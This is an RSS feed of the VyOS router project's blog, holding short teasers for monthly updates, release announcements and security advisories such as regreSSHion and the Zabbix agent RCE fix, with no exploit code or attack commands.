<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
  <channel>
    <title>VyOS - Blog</title>
    <link>https://blog.vyos.io</link>
    <description>VyOS Platform Project news and updates 
All about development and project life in  our blog</description>
    <language>en</language>
    <pubDate>Wed, 15 Oct 2025 15:15:53 GMT</pubDate>
    <dc:date>2025-10-15T15:15:53Z</dc:date>
    <dc:language>en</dc:language>
    <item>
      <title>VyOS Project September 2025 Update</title>
      <link>https://blog.vyos.io/vyos-project-september-2025-update</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-project-september-2025-update" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_september_02_1x.webp" alt="VyOS Project September 2025 Update" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community! The holiday season in the Northern hemisphere is over and it's very visible in the commit log. There are lots of things that happened in VyOS in September — that includes a new, more performant kernel mode NetFlow sensor; the equally long-awaited support for using firewall groups in WAN load balancing rules; improvements that will hopefully make config corruption on power loss very unlikely; TLS support for syslog; and many more smaller features and fixes.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-project-september-2025-update" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_september_02_1x.webp" alt="VyOS Project September 2025 Update" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community! The holiday season in the Northern hemisphere is over and it's very visible in the commit log. There are lots of things that happened in VyOS in September — that includes a new, more performant kernel mode NetFlow sensor; the equally long-awaited support for using firewall groups in WAN load balancing rules; improvements that will hopefully make config corruption on power loss very unlikely; TLS support for syslog; and many more smaller features and fixes.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-project-september-2025-update&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>vyos</category>
      <category>1.4</category>
      <category>load balancing</category>
      <category>netflow</category>
      <pubDate>Wed, 15 Oct 2025 15:15:52 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-project-september-2025-update</guid>
      <dc:date>2025-10-15T15:15:52Z</dc:date>
    </item>
    <item>
      <title>VyOS Project August 2025 Update</title>
      <link>https://blog.vyos.io/vyos-project-august-2025-update</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-project-august-2025-update" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_august_05_1_5x.webp" alt="Two people on a beach at sunset" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;We have some big news for you all in August — the count of changes that VyOS maintainers and community member made this month is small, but their impact makes up for the low number. They include VRF support for DHCP and DHCPv6 servers, steady progress in the legacy configuration backend replacement, multiple bug fixes, and an experimental privilege separation feature that allows limiting users to specific sets of operational commands.&lt;/p&gt; 
&lt;h2&gt;&lt;/h2&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-project-august-2025-update" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_august_05_1_5x.webp" alt="Two people on a beach at sunset" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;We have some big news for you all in August — the count of changes that VyOS maintainers and community member made this month is small, but their impact makes up for the low number. They include VRF support for DHCP and DHCPv6 servers, steady progress in the legacy configuration backend replacement, multiple bug fixes, and an experimental privilege separation feature that allows limiting users to specific sets of operational commands.&lt;/p&gt; 
&lt;h2&gt;&lt;/h2&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-project-august-2025-update&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>vpp</category>
      <category>load balancing</category>
      <category>dhcp</category>
      <pubDate>Tue, 02 Sep 2025 10:15:05 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-project-august-2025-update</guid>
      <dc:date>2025-09-02T10:15:05Z</dc:date>
    </item>
    <item>
      <title>VyOS Stream 1.5-2025-Q2 is available for download</title>
      <link>https://blog.vyos.io/vyos-stream-1.5-2025-q2-is-available-for-download</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-stream-1.5-2025-q2-is-available-for-download" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_stream_1_5_2025_q1_option_1_2x.webp" alt="VyOS Stream 1.5-2025-Q2 is available for download" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;&lt;span&gt;VyOS Stream 1.5-2025-Q2&amp;nbsp;and its corresponding source tarball are now &lt;a href="https://vyos.net/get/stream/#1.5-2025-Q2"&gt;available for download&lt;/a&gt;. This is the second VyOS Stream release on the way to the upcoming VyOS 1.5 LTS, and it includes multiple bug fixes and improvements, including the new implementation of WAN load balancing, a general mechanism for allowing conntrack-unfriendly protocols in transparent bridge firewalls, a fix for CVE-2025-30095 (active MitM in console server SSH connections) that was already delivered in VyOS 1.4.2, and more.&lt;/span&gt;&lt;/p&gt; 
&lt;p&gt;&amp;nbsp;&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-stream-1.5-2025-q2-is-available-for-download" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_stream_1_5_2025_q1_option_1_2x.webp" alt="VyOS Stream 1.5-2025-Q2 is available for download" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;&lt;span&gt;VyOS Stream 1.5-2025-Q2&amp;nbsp;and its corresponding source tarball are now &lt;a href="https://vyos.net/get/stream/#1.5-2025-Q2"&gt;available for download&lt;/a&gt;. This is the second VyOS Stream release on the way to the upcoming VyOS 1.5 LTS, and it includes multiple bug fixes and improvements, including the new implementation of WAN load balancing, a general mechanism for allowing conntrack-unfriendly protocols in transparent bridge firewalls, a fix for CVE-2025-30095 (active MitM in console server SSH connections) that was already delivered in VyOS 1.4.2, and more.&lt;/span&gt;&lt;/p&gt; 
&lt;p&gt;&amp;nbsp;&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-stream-1.5-2025-q2-is-available-for-download&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>firewall</category>
      <category>security</category>
      <category>1.5</category>
      <category>load balancing</category>
      <category>vyos-stream</category>
      <pubDate>Fri, 11 Jul 2025 18:55:23 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-stream-1.5-2025-q2-is-available-for-download</guid>
      <dc:date>2025-07-11T18:55:23Z</dc:date>
    </item>
    <item>
      <title>VyOS Project March 2025 Update</title>
      <link>https://blog.vyos.io/vyos-project-march-2025-update</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-project-march-2025-update" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_march_05.png" alt="A flowering tree against the background of a blue sky" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community! It's spring in the northern hemisphere, and here's the March update. A lot of our effort is currently going into the development of the accelerated dataplane based on VPP: We added a prototype of IPsec, and we are actively working on support for NAT. But there are many other updates, including a fix for a vulnerability in &lt;code&gt;service console-server&lt;/code&gt;, support for loading firewall groups from a URL, an option to set a custom container registry, and more. Read on for details!&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-project-march-2025-update" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_march_05.png" alt="A flowering tree against the background of a blue sky" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community! It's spring in the northern hemisphere, and here's the March update. A lot of our effort is currently going into the development of the accelerated dataplane based on VPP: We added a prototype of IPsec, and we are actively working on support for NAT. But there are many other updates, including a fix for a vulnerability in &lt;code&gt;service console-server&lt;/code&gt;, support for loading firewall groups from a URL, an option to set a custom container registry, and more. Read on for details!&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-project-march-2025-update&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>bgp</category>
      <category>firewall</category>
      <category>security</category>
      <category>vpp</category>
      <pubDate>Thu, 27 Mar 2025 14:10:08 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-project-march-2025-update</guid>
      <dc:date>2025-03-27T14:10:08Z</dc:date>
    </item>
    <item>
      <title>VyOS 1.4.1 release</title>
      <link>https://blog.vyos.io/vyos-1.4.1-release</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.4.1-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_release_1.png" alt="VyOS 1.4.1 release" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;VyOS 1.4.1 release is now available to customers and community members with contributor subscriptions. Its source code is available as a tarball upon request to everyone who legitimately received a binary image for us.&amp;nbsp; Fixes for CVE-2023-32728 (Zabbix agent SMART plugin RCE) and CVE-2024-6387 (regreSSHion) that were already available as hotfixes are integrated in the image, and there is a fix for a potential DoS in the HTTP API caused by a vulnerability in the python-multipart library (CVE-2024-53981). This release also includes multiple bug fixes and a few improvements, including support for Base64-encoded IPsec secrets, VXLAN VNI to VLAN range mappings, reject routes, and more — read on for details!&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.4.1-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/vyos_blogpost_img_release_1.png" alt="VyOS 1.4.1 release" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;VyOS 1.4.1 release is now available to customers and community members with contributor subscriptions. Its source code is available as a tarball upon request to everyone who legitimately received a binary image for us.&amp;nbsp; Fixes for CVE-2023-32728 (Zabbix agent SMART plugin RCE) and CVE-2024-6387 (regreSSHion) that were already available as hotfixes are integrated in the image, and there is a fix for a potential DoS in the HTTP API caused by a vulnerability in the python-multipart library (CVE-2024-53981). This release also includes multiple bug fixes and a few improvements, including support for Base64-encoded IPsec secrets, VXLAN VNI to VLAN range mappings, reject routes, and more — read on for details!&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-1.4.1-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>ipsec</category>
      <category>qos</category>
      <category>release</category>
      <category>security</category>
      <category>1.4</category>
      <pubDate>Fri, 20 Dec 2024 16:55:59 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-1.4.1-release</guid>
      <dc:date>2024-12-20T16:55:59Z</dc:date>
    </item>
    <item>
      <title>Remote code execution in listening Zabbix agent (CVE-2023-32728)</title>
      <link>https://blog.vyos.io/remote-code-execution-in-listening-zabbix-agent-cve-2023-32728</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/remote-code-execution-in-listening-zabbix-agent-cve-2023-32728" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Remote%20code%20execution%20in%20listening%20Zabbix%20agent%20(CVE-2023-32728).png" alt="zabbix cve" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;Our community member Fabian Riechsteiner &lt;a href="https://vyos.dev/T6776"&gt;brought to our attention&lt;/a&gt; that the version of the Zabbix agent present in VyOS 1.4.0 is susceptible to a remote code execution vulnerability — &lt;a href="https://support.zabbix.com/browse/ZBX-23858"&gt;CVE-2023-32728&lt;/a&gt;. We made a hotfix available to subscribers, and the fix will be a part of the upcoming VyOS 1.4.1 release.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/remote-code-execution-in-listening-zabbix-agent-cve-2023-32728" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/Remote%20code%20execution%20in%20listening%20Zabbix%20agent%20(CVE-2023-32728).png" alt="zabbix cve" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;Our community member Fabian Riechsteiner &lt;a href="https://vyos.dev/T6776"&gt;brought to our attention&lt;/a&gt; that the version of the Zabbix agent present in VyOS 1.4.0 is susceptible to a remote code execution vulnerability — &lt;a href="https://support.zabbix.com/browse/ZBX-23858"&gt;CVE-2023-32728&lt;/a&gt;. We made a hotfix available to subscribers, and the fix will be a part of the upcoming VyOS 1.4.1 release.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fremote-code-execution-in-listening-zabbix-agent-cve-2023-32728&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>1.4</category>
      <category>vulnerability</category>
      <pubDate>Thu, 24 Oct 2024 09:17:37 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/remote-code-execution-in-listening-zabbix-agent-cve-2023-32728</guid>
      <dc:date>2024-10-24T09:17:37Z</dc:date>
    </item>
    <item>
      <title>CVE-2024-6387 (regreSSHion)</title>
      <link>https://blog.vyos.io/cve-2024-6387-regresshion</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/cve-2024-6387-regresshion" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/CVE-2024-6387.png" alt="CVE-2024-6387: remote code execution in OpenSSH server" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;Today Qualys's security team has disclosed a remotely exploitable vulnerability in OpenSSH server. It was assigned CVE-2024-6387 number and nicknamed "regreSSHion" because its cause is an accidental removal of code that fixed a much earlier vulnerability back in 2006. It affects OpenSSH versions older than 4.4p1 and versions between 8.5p1 and 9.8p1. VyOS 1.3.8 includes OpenSSH 7.9p1 and thus isn't vulnerable. VyOS 1.4.0 includes 9.2p1 and will need a patch to remain secure.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/cve-2024-6387-regresshion" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/CVE-2024-6387.png" alt="CVE-2024-6387: remote code execution in OpenSSH server" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;Today Qualys's security team has disclosed a remotely exploitable vulnerability in OpenSSH server. It was assigned CVE-2024-6387 number and nicknamed "regreSSHion" because its cause is an accidental removal of code that fixed a much earlier vulnerability back in 2006. It affects OpenSSH versions older than 4.4p1 and versions between 8.5p1 and 9.8p1. VyOS 1.3.8 includes OpenSSH 7.9p1 and thus isn't vulnerable. VyOS 1.4.0 includes 9.2p1 and will need a patch to remain secure.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fcve-2024-6387-regresshion&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>announcement</category>
      <category>vulnerability</category>
      <pubDate>Mon, 01 Jul 2024 10:24:00 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/cve-2024-6387-regresshion</guid>
      <dc:date>2024-07-01T10:24:00Z</dc:date>
    </item>
    <item>
      <title>VyOS 1.3.7 release</title>
      <link>https://blog.vyos.io/vyos-1.3.7-release</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.7-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/VyOS%201.3.7.png" alt="1.3.7" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;VyOS 1.3.7/Equuleus maintenance release is available now. It fixes the buffer overflow vulnerability recently discovered in GNU libc (CVE-2024-2961). It also adds a few useful options, such as startup resync in conntrack-sync and multiple peers for unicast VRRP; improves PPPoE server syntax to allow PADO delay of zero and client pools with arbitrary subnet masks; and fixes a bunch of bugs, including a bug that prevented BGP RPKI from loading correctly. Read on for details!&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.7-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/VyOS%201.3.7.png" alt="1.3.7" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;VyOS 1.3.7/Equuleus maintenance release is available now. It fixes the buffer overflow vulnerability recently discovered in GNU libc (CVE-2024-2961). It also adds a few useful options, such as startup resync in conntrack-sync and multiple peers for unicast VRRP; improves PPPoE server syntax to allow PADO delay of zero and client pools with arbitrary subnet masks; and fixes a bunch of bugs, including a bug that prevented BGP RPKI from loading correctly. Read on for details!&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-1.3.7-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <category>1.3</category>
      <pubDate>Mon, 13 May 2024 17:18:36 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-1.3.7-release</guid>
      <dc:date>2024-05-13T17:18:36Z</dc:date>
    </item>
    <item>
      <title>xz backdoor, netfilter vulnerability, and a rolling release signing key leak</title>
      <link>https://blog.vyos.io/xz-backdoor-netfilter-vulnerability-and-a-rolling-release-signing-key-leak</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/xz-backdoor-netfilter-vulnerability-and-a-rolling-release-signing-key-leak" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/xz%20backdoor%2c%20netfilter%20vulnerability.png" alt="xz backdoor" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;There were quite a few security incidents lately that caught everyone's attention.&lt;/p&gt; 
&lt;p&gt;Thankfully, none had any real impact on VyOS security, but let's go through them and discuss them in more detail.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/xz-backdoor-netfilter-vulnerability-and-a-rolling-release-signing-key-leak" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/xz%20backdoor%2c%20netfilter%20vulnerability.png" alt="xz backdoor" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, Community!&lt;/p&gt; 
&lt;p&gt;There were quite a few security incidents lately that caught everyone's attention.&lt;/p&gt; 
&lt;p&gt;Thankfully, none had any real impact on VyOS security, but let's go through them and discuss them in more detail.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fxz-backdoor-netfilter-vulnerability-and-a-rolling-release-signing-key-leak&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>vyos</category>
      <pubDate>Tue, 02 Apr 2024 17:35:01 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/xz-backdoor-netfilter-vulnerability-and-a-rolling-release-signing-key-leak</guid>
      <dc:date>2024-04-02T17:35:01Z</dc:date>
    </item>
    <item>
      <title>VyOS 1.3.6 maintenance release</title>
      <link>https://blog.vyos.io/vyos-1.3.6-maintenance-release</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.6-maintenance-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/VyOS%201.3.6.png" alt="VyOS 1.3.6 maintenance release" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, community!&lt;br&gt;VyOS 1.3.6 LTS release is here — with many bug fixes and security updates. The most important are fixes for denial of service vulnerabilities in the HTTPS API server and web proxy and more&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-1.3.6-maintenance-release" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/VyOS%201.3.6.png" alt="VyOS 1.3.6 maintenance release" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, community!&lt;br&gt;VyOS 1.3.6 LTS release is here — with many bug fixes and security updates. The most important are fixes for denial of service vulnerabilities in the HTTPS API server and web proxy and more&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fvyos-1.3.6-maintenance-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <category>1.3</category>
      <pubDate>Wed, 14 Feb 2024 07:06:16 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/vyos-1.3.6-maintenance-release</guid>
      <dc:date>2024-02-14T07:06:16Z</dc:date>
    </item>
    <item>
      <title>VyOS Project February 2024 Update</title>
      <link>https://blog.vyos.io/vyos-project-february-2024-update</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-project-february-2024-update" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/VyOS%20Project%20feb%202024.png" alt="feb2024" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;p&gt;Hello, community!&lt;br&gt;Curious what we've been up to in January? Our main focus is the final stabilization of the 1.4.0/Sagitta branch, and we will soon make the first EPA (Early Production Access) release — after that point, config syntax and behavior will not change in the 1.4 LTS release lifetime, and all radical changes will go to the upcoming 1.5/Circinus branch. Quite a lot of things are happening in the development branch, and many of those improvements are also backported to 1.4, including support for Let's Encrypt (or any other ACME provider) in PKI, multiple BGP improvements, and an option to disable Spectre/Meltdown mitigations from the CLI.&lt;/p&gt;</description>
      <content:encoded>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://blog.vyos.io/vyos-project-february-2024-update" title="" class="hs-featured-image-link"&gt; &lt;img src="https://blog.vyos.io/hubfs/VyOS%20Project%20feb%202024.png" alt="feb2024" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
